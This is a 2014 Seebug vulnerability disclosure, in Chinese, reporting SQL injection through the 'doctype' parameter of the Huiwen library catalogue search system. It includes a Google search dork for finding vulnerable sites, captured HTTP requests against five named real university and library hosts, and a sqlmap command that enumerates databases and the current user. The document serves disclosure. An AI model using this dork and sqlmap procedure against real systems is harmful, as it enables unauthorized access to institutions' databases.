某图书馆书目检索系统存在通用型SQL注入

2014-12-05T00:00:00
ID SSV:95272
Type seebug
Reporter Root
Modified 2014-12-05T00:00:00

Description

简要描述:

某图书馆书目检索系统存在通用型SQL注入

详细说明:

汇文图书馆数目检索系统存在SQL注入 注入点doctype 谷歌搜索关键字:inurl:/opac/search.php,影响范围很大

<img src="https://images.seebug.org/upload/201412/04130614f0ca483bc418c82b861d5a6866b5b79a.png" alt="QQ截图20141204130534.png" width="600" onerror="javascript:errimg(this);">

1、访问http://120.195.143.181:9090/opac/search.php 发现搜索有多处参数,于是提交时抓包 GET http://120.195.143.181:9090/opac/openlink.php?strText=sssssssssssssss&doctype=ALL&strSearchType=title&match_flag=forward&displaypg=20&sort=CATA_DATE&orderby=desc&showmode=list&location=ALL HTTP/1.1 Host: 120.195.143.181:9090 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://120.195.143.181:9090/opac/search.php Cookie: PHPSESSID=5f90sbejnesoi0l6le8cecrbv0 Connection: keep-alive 将抓包的参数存入txt文档,用SQLMAP跑下 Sqlmap py -r 1s.txt -p "doctype" --dbs --current-user --current-db

<img src="https://images.seebug.org/upload/201412/041303223c57f852fe85592921b6b052513c1193.png" alt="1.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201412/04130343e127f0de467200a1e97f078a495b9fd6.png" alt="2.png" width="600" onerror="javascript:errimg(this);">

再看下其他的4个案例 2、http://202.199.137.66/webphp/opac/search.php GET http://202.199.137.66/webphp/opac/openlink.php?strSearchType=title&match_flag=forward&historyCount=1&strText=aaaaa&doctype=ALL&with_ebook=on&displaypg=20&showmode=list&sort=CATA_DATE&orderby=desc&location=ALL HTTP/1.1 Host: 202.199.137.66 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://202.199.137.66/webphp/opac/search.php Cookie: PHPSESSID=0l65tghtpumq4vo2rt848p5lo3 Connection: keep-alive

<img src="https://images.seebug.org/upload/201412/04130712bc8b65e62511e39336eab99b0b14cad4.png" alt="3.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201412/0413072411c95dafab94032fd44260ca4ae8c8a0.png" alt="4.png" width="600" onerror="javascript:errimg(this);">

3、http://opac.wzu.edu.cn/opac/search.php GET http://opac.wzu.edu.cn/opac/openlink.php?strSearchType=title&match_flag=forward&historyCount=1&strText=ssadad&doctype=ALL&displaypg=20&showmode=list&sort=CATA_DATE&orderby=desc&location=ALL HTTP/1.1 Host: opac.wzu.edu.cn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://opac.wzu.edu.cn/opac/search.php Cookie: PHPSESSID=kdq1bsidg9nru5uhm6tqqrf7n4 Connection: keep-alive

<img src="https://images.seebug.org/upload/201412/04130820ddbd5ae23cece39466d3b8d9d3ab9f06.png" alt="5.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201412/041308318d789f3270868b503b66059ff908630a.png" alt="6.png" width="600" onerror="javascript:errimg(this);">

4、http://210.32.33.91:8080/opac/search.php GET http://210.32.33.91:8080/opac/openlink.php?strSearchType=title&historyCount=1&strText=sssss&x=43&y=4&doctype=ALL&match_flag=any&displaypg=20&sort=CATA_DATE&orderby=desc&showmode=list&dept=ALL HTTP/1.1 Host: 210.32.33.91:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://210.32.33.91:8080/opac/search.php Cookie: PHPSESSID=hb7u7b05q2phsu880ngp3osij4 Connection: keep-alive

<img src="https://images.seebug.org/upload/201412/041309060e5153ffffd3b18cc9a7ed93e196642f.png" alt="7.png" width="600" onerror="javascript:errimg(this);">

5、http://219.219.4.7/opac/search.php GET http://219.219.4.7/opac/openlink.php?historyCount=1&strText=aaaaaaaaaaaaaa&doctype=ALL&strSearchType=title&match_flag=forward&displaypg=20&sort=CATA_DATE&orderby=desc&showmode=list&dept=ALL HTTP/1.1 Host: 219.219.4.7 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://219.219.4.7/opac/search.php Cookie: PHPSESSID=tu4r3phbgh42hhs8s7t7pvl6c6 Connection: keep-alive

<img src="https://images.seebug.org/upload/201412/041309364651c26f7a811a86dfce829b83f55116.png" alt="8.png" width="600" onerror="javascript:errimg(this);">

漏洞证明:

已证明